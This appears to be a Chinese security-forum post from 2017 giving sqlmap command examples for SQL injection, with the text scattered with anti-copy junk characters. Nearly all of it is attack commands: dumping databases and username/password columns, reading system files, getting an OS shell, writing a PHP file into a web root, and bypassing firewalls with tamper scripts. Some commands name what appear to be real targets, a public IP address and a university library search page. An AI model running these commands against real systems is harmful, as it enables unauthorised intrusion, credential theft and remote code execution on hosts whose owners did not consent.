找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1873|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap' |# {' B! O" b; ]9 c, b

/ u% C+ v8 v/ B" N' @0 y2 z# [2 _update :::::>     in the folder   after  execute    following   order : svn update
: c. m% d0 F/ F8 k- L
0 K  \5 C) h" F; g7 Z3 m% psqlmap.py -r 1.txt --current-db
2 b1 j/ Z2 w# _1 i; q% M
5 C2 T7 @' k% ?% P: Jv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 F, n; {0 @' v2 f' d1 |
0 z& j% ?0 y! h3 x$ a1 t9 d. ?==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
# n4 {9 e! c! b$ {- d猜解数据库2 w, A" |% i( z, K
./sqlmap.py -u "injection-url" --dbs
  a; R/ ~/ v+ l0 A9 csqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"& e2 u5 ?' e3 {/ S  d6 o
2 U8 N* I, Y; N
猜解表名8 P$ S( D# x4 q
./sqlmap.py -u "injection-url" -D database_name --tables
9 o, q" ?( {4 N4 L8 p/ J, E4 s
6 b$ Q4 M' ?4 D* @& ^sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py". j( d. Q  u' Z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" . z6 l+ f' Z8 L2 q

- V9 K* `+ x/ o! X* D4 q8 j% k" ]sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump% D, G+ t4 V' \5 C

# n; U4 b! z6 h7 l' ]1 d8 Z- }sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"9 P" R7 j2 |3 @3 R% y5 C- U2 r
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
. ], b7 T  b0 C6 |, csqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" ! V3 {9 B" {. [5 h# M0 R- \
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
3 l2 X: P3 T- W: {8 t1 L. k0 r
/ E& a5 r# Y5 X& k6 |sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"9 K; s+ Z- T4 |* x
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"' d0 I: j' E# y
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
  T4 O- e6 v% ~* u# ?5 esqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
7 z# T" Z9 H9 d0 ^* vsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump8 G8 k9 _! q! \9 q2 B
, ]* I/ S1 W6 B% Q0 C
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了8 j  Y( t( L$ R1 a0 I3 Q
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
6 F, X9 n7 i$ `9 ^( ?: f3 ~; @' o0 k. |& _
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"$ d1 x& d' l, }2 Y; n
猜解列名- v$ ?0 l9 k; h1 F3 `( w! Y
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns3 e1 G) r* `3 o+ `# u
# }  I4 l8 K9 D. O% U# r- c1 P$ g9 f
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" . i& D/ r# A( Z3 L
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" % q  i3 d1 q, A, J8 L+ z& U0 }
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
0 `" J% ?7 Y: x! N4 @  A( Y: v% Y" t/ F8 T0 f+ x
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
. L8 M5 U& ~! F4 p&submit=Go) S# O& E' n$ m9 h* @- a' `# h! H5 J) P
猜解值
1 N( N! D- [9 y; I, E./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
. P" r( A% u, [8 ]========================================================
4 D. ?3 T/ T2 B$ U! `/ L4 S搜索表名中包括mana字符的
" \9 C  b- [6 W! y0 _/sqlmap.py -u "injection-url" -T mana --search# W* [4 U( C$ S& b
返回一个交互式sql shell& j% k& G% K& @3 A/ h
/sqlmap.py -u "injection-url" --sql-shell
: ?$ n. C+ ?% ~/ j4 [+ d7 O读取指定文件(需权限)5 L. j7 v9 V$ P2 b! ~5 l
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
9 B* d" a; u- D9 A查看当前 用户 及 数据库 ( |: W1 ]7 f! Y
/sqlmap.py -u "injection-url" --current-user --current-db
8 j; M) O+ ?7 |$ C" i6 d本地文件 写入 远程目标绝对路径
$ H. J' j7 R, C/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% G6 I7 s6 A* P: k$ \sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 2 m7 b/ `  Z  Y: t! K& \

, E8 r* q0 S5 J( p7 E2 b/ \sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 q) H& H  x+ w查看某用的权限
+ K; T3 ~, n" [. H9 b: q. z6 Y/sqlmap.py -u "injection-url" --privileges -U root5 O' {& `$ h% }# E1 X9 e
查看当前用户是否为dba
+ ~+ M& w0 N1 G* ^5 u! N' U/sqlmap.py -u "injection-url" --is-dba
4 g8 Z3 d$ n9 f" d3 A2 k读取所有数据库用户或指定数据库用户的密码
4 v8 F. w- _! G0 m+ fsqlmap.py -r 1.txt --users --passwords" P! e' D4 A$ T9 Q
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
: P1 z/ q, s  t* Z9 X5 {4 ?* k0 a! U9 Y& J9 a7 b6 u7 ?+ b
/sqlmap.py -u "injection-url" --passwords -U root
- r+ p. s6 E2 }3 k7 w. t+ ^" ~. l9 @  C
--start&&--stop 与 --first&&--last 的区别  w" c) J& h, P7 N  c) \
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
8 P* F7 J5 }& U0 D9 Z+ U4 x7 j  J2 [" _7 `( O8 B
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
# P* I2 p# [; m& o3 I/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables0 x# b4 c/ m7 l/ u
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns% L# T. p& X: p6 z6 @' \
8 w0 @3 O" }. V$ a
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)% R! Z: n  K* O5 X* Z# P, T
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
- J+ d9 M: I0 w) x9 {% ?* p
1 k0 V, L; g1 T6 I. D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表